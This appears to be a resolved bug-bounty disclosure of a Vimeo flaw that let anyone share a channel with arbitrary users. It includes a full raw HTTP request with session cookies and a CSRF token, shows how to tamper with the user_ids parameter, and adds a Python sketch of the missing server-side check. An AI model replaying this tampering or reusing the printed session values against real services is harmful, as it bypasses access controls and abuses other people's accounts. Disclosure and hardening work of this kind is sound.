Share your channel to any user on vimeo without following him
Unknown
Vulnerability Details
Hi Team,
Hope you are good.
A privilege escalation vulnerability exists on the request for sharing your channel with a user.
You can share your channel with any user without even following him.
Request:
POST /channels/893054 HTTP/1.0
Host: vimeo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: https://vimeo.com/channels/893054
Content-Length: 155
Cookie: vuid=1508464746.1333941254; __utma=18302654.119544349.1426737086.1426737086.1426737086.2; __utmc=18302654; __utmz=18302654.1426737086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=18302654.|2=user_type=basic=1^3=ms=0=1^7=video_count=0=1^10=vuid=1508464746.1333941254=1; has_logged_in=1; stats_start_date=2015%2F03%2F15; stats_end_date=2015%2F03%2F19; __gads=ID=c9339811dfc88470:T=1426737131:S=ALNI_MZDCrEc2e-pl3FH439sQhwleaJtWQ; site_settings=%7B%22sticky_page%22%3A%22%5C%2Fmyvideos%22%2C%22browse_format_vid%22%3A%22video%22%7D; player=""; _abexps=%7B%2246%22%3A%22%22%7D; auto_load_stats=1; stream_id=Y2xpcHM6Mzg0NzcwMDM6aWQ6ZGVzYzpbXQ%3D%3D; stream_pos=1; __utmb=18302654.60.9.1426783441248; vimeo=epkmdrrssk70pcdx9rmxrtx7jpcdx9rmxrtx7%2Cpxux2vsdtxss0tf05kmcm5fv2fx9v0c5vkfkc5fm0; vimeo_player=eypkmdrrssk70pcdx9rmxrtx7jpcdx9rmxrtx7%2Cpcc9xcrfrv92stm0duwkvs9wrcmmv9scmvu2rdw9k; clips=9860371; __utmli=follow_btn; xsrft=2e1ac78a9327ebf091aea130bb17a855.d233e8fa090465217a917c2b74e7645e
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=send_message&user_ids=37857677&user_emails=&message=&token=2e1ac78a9327ebf091aea130bb17a855.d233e8fa090465217a917c2b74e7645e&collection_type=channel
Vulnerable parameter: user_id. Just change the user ID and put any user ID. It will work.
Privilege escalation is on this request, which doesn't check whether you are following the user (user_id) or not.
Response:
HTTP/1.0 200 OK
Date: Thu, 19 Mar 2015 16:45:24 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Mar 2015 04:45:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=edge
X-Frame-Options: sameorigin
Content-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'; report-uri /_csp
Content-Length: 147
Accept-Ranges: bytes
Via: 1.1 varnish
X-Served-By: cache-lax1420-LAX
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1426783524.491806,VS0,VE153
Vary: User-Agent,Accept-Encoding
Set-Cookie: xsrft=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.vimeo.com
Keep-Alive: timeout=10, max=50
Connection: Keep-Alive
Kindly fix this ASAP.
Thanks !
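A server-side authorization check of the kind this report calls for, as an added example that is not Vimeo's code and not part of the report: the share handler without the check beside one that verifies the sender follows every recipient before anything is sent. The follow graph, the function names and the comma-separated form of user_ids are assumptions.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Constructed sample follow graph (not real data): follower id -> ids they follow.
FOLLOWS = {
    "100": {"200", "300"},  # user 100 follows 200 and 300
    "200": set(),           # user 200 follows nobody
}

@dataclass
class Result:
    status: int
    delivered: list = field(default_factory=list)
    error: str = ""

def parse_share_body(body: str) -> dict:
    """Parse the application/x-www-form-urlencoded body of the share request."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def recipients(form: dict) -> list:
    # Assumption: user_ids is comma-separated; blanks are ignored.
    return [u.strip() for u in form.get("user_ids", "").split(",") if u.strip()]

def _well_formed(form: dict) -> bool:
    return form.get("action") == "send_message" and form.get("collection_type") == "channel"

def share_channel_vulnerable(sender: str, body: str) -> Result:
    """Mirrors the reported behaviour: any user_ids value is accepted as-is;
    nothing ties the recipients to the sender's follow relationships."""
    form = parse_share_body(body)
    if not _well_formed(form):
        return Result(400, error="bad request")
    return Result(200, delivered=recipients(form))

def share_channel_fixed(sender: str, body: str) -> Result:
    """Hardened version: every recipient must be followed by the sender. If any
    recipient fails the check the whole request is refused and nothing is sent."""
    form = parse_share_body(body)
    if not _well_formed(form):
        return Result(400, error="bad request")
    targets = recipients(form)
    if not targets:
        return Result(400, error="no recipients")
    followed = FOLLOWS.get(sender, set())
    not_followed = [u for u in targets if u not in followed]
    if not_followed:
        # Enforced server-side; the client's follow button is not a control.
        return Result(403, error="not following: " + ",".join(not_followed))
    return Result(200, delivered=targets)
```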
Report Stats
- Report ID: 52708
- State: Closed
- Substate: resolved
- Upvotes: 1